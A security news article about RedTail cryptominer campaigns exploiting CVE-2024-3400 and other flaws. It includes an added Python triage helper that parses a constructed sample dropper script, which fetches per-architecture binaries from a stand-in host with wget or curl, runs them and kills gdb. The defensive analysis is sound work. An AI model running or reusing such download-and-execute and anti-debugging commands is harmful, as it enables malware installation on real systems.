RedTail cryptocurrency mining malware exploits Palo Alto Networks firewall vulnerability
May 30, 2024 | Press room | Vulnerability / Cryptocurrency
The threat actors behind the RedTail cryptocurrency mining malware have added a recently disclosed security flaw affecting Palo Alto Networks firewalls to their arsenal of exploits.
According to findings from web security and infrastructure firm Akamai, the addition of the PAN-OS vulnerability to its toolkit has been complemented by updates to the malware, which now incorporates new anti-analysis techniques.
“Attackers have taken a step forward by employing private cryptocurrency mining pools for greater control over mining results despite increased operational and financial costs,” said security researchers Ryan Barnett, Stiv Kupchik and Maxim Zavodchik in a technical report shared with The Hacker News.
The infection sequence discovered by Akamai exploits a now-patched vulnerability in PAN-OS tracked as CVE-2024-3400 (CVSS Score: 10.0) which could allow an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.
A successful exploitation is followed by the execution of commands designed to retrieve and execute a bash shell script from an external domain which, in turn, is responsible for downloading the RedTail payload based on the CPU architecture.
Other RedTail propagation mechanisms involve exploitation of known security flaws in TP-Link (CVE-2023-1389), ThinkPHP (CVE-2018-20062), Ivanti Connect Secure (CVE-2023-46805 and CVE-2024-21887) and VMware Workspace ONE Access and Identity Manager (CVE-2022-22954).
RedTail was first documented by security researcher Patryk Mahowiak in January 2024 in connection with a campaign that exploited the Log4Shell vulnerability (CVE-2021-44228) to distribute malware on Unix-based systems.
Then, in March 2024, Barracuda Networks disclosed details on cyber attacks exploiting flaws in SonicWall (CVE-2019-7481) and Visual Tools DVR (CVE-2021-42071) to install variants of the Mirai botnet, as well as shortcomings in ThinkPHP for deploying RedTail.
The latest version of the miner spotted in April packs significant updates as it includes an encrypted mining setup used to launch the built-in XMRig miner.
Another notable change is the absence of a cryptocurrency wallet in the configuration, indicating that the threat actors may have switched to a private mining pool or a proxy pool to collect the proceeds.
“The setup also shows that threat actors are trying to optimize the mining operation as much as possible, indicating a deep understanding of crypto-mining,” the researchers said.
“Unlike the previous RedTail variant reported in early 2024, this malware uses advanced evasion and persistence techniques. It forks itself multiple times to hinder analysis by debugging the process and kills any instance of [GNU Debugger] it finds.”
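The article describes two concrete behaviours an analyst will meet when triaging a RedTail-style infection: the first-stage shell script that picks a payload by CPU architecture, and the anti-analysis step that kills GNU Debugger. The following triage helper is an added example and not code from the article or from Akamai; the embedded dropper script is constructed for the example (the host `malicious.example`, the paths and the file names are invented), and the function names `arch_payload_map`, `extract_urls`, `anti_analysis_indicators` and `triage` are the author's own. It pulls the per-architecture download URLs out of the `case` dispatch (for blocklisting and for fetching every variant, not just the one matching the analyst's machine) and flags lines that kill `gdb`.

```python
import re
from typing import Dict, List

# Constructed sample of a dropper script of the kind the article describes:
# select a payload by CPU architecture, download it, run it. This is NOT the
# real RedTail script; host, paths and file names are invented for the example.
SAMPLE_DROPPER = r'''#!/bin/bash
ARCH=$(uname -m)
case "$ARCH" in
  x86_64)  URL="http://malicious.example/bin/miner.x86_64" ;;
  i686)    URL="http://malicious.example/bin/miner.i686" ;;
  aarch64) URL="http://malicious.example/bin/miner.arm64" ;;
  armv7l)  URL="http://malicious.example/bin/miner.armv7" ;;
  *) exit 1 ;;
esac
cd /tmp || exit 1
wget -q "$URL" -O .redtail || curl -s "$URL" -o .redtail
chmod +x .redtail
pkill -9 gdb
./.redtail
'''

# One arm of a shell "case" statement that assigns URL="...": captures the
# pattern list (e.g. x86_64 or i686|i386) and the quoted URL.
CASE_ARM = re.compile(r'^\s*([\w|*]+)\)\s*URL="([^"]+)"', re.M)
# Any http(s) URL literal in the script, for blocklisting.
URL_RE = re.compile(r'https?://[^\s"\'<>]+')
# Process-killing commands aimed at gdb (the anti-analysis step the researchers describe).
KILL_GDB = re.compile(r'\b(?:pkill|killall|kill)\b[^\n]*\bgdb\b')


def arch_payload_map(script: str) -> Dict[str, str]:
    """Map each architecture in the case dispatch to the payload URL it selects.

    The catch-all "*" arm is skipped; a pattern like "i686|i386" yields one
    entry per alternative.
    """
    mapping: Dict[str, str] = {}
    for pattern, url in CASE_ARM.findall(script):
        for arch in pattern.split("|"):
            if arch != "*":
                mapping[arch] = url
    return mapping


def extract_urls(script: str) -> List[str]:
    """Return the sorted set of distinct URL literals found in the script."""
    return sorted(set(URL_RE.findall(script)))


def anti_analysis_indicators(script: str) -> List[str]:
    """Return the stripped lines that try to kill a debugger (gdb)."""
    return [line.strip() for line in script.splitlines() if KILL_GDB.search(line)]


def triage(script: str) -> dict:
    """Combine the three extractions into one report for an analyst."""
    return {
        "payloads_by_arch": arch_payload_map(script),
        "urls": extract_urls(script),
        "anti_analysis": anti_analysis_indicators(script),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_DROPPER), indent=2))
```

The per-architecture map is the part worth keeping: a sandbox that runs the dropper on x86_64 only sees one binary, while the other arms point at the variants built for the routers and embedded devices the other CVEs in this campaign target. Feed every URL, not just the one your sandbox fetched, to the blocklist and the retrieval queue.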
Akamai described RedTail as having a high level of polish, something not commonly seen among cryptocurrency miner malware families out there.
“The investments required to run a private cryptocurrency mining operation are significant, including staff, infrastructure, and obfuscation,” the researchers concluded. “This sophistication could be indicative of a nation-state sponsored attack group.”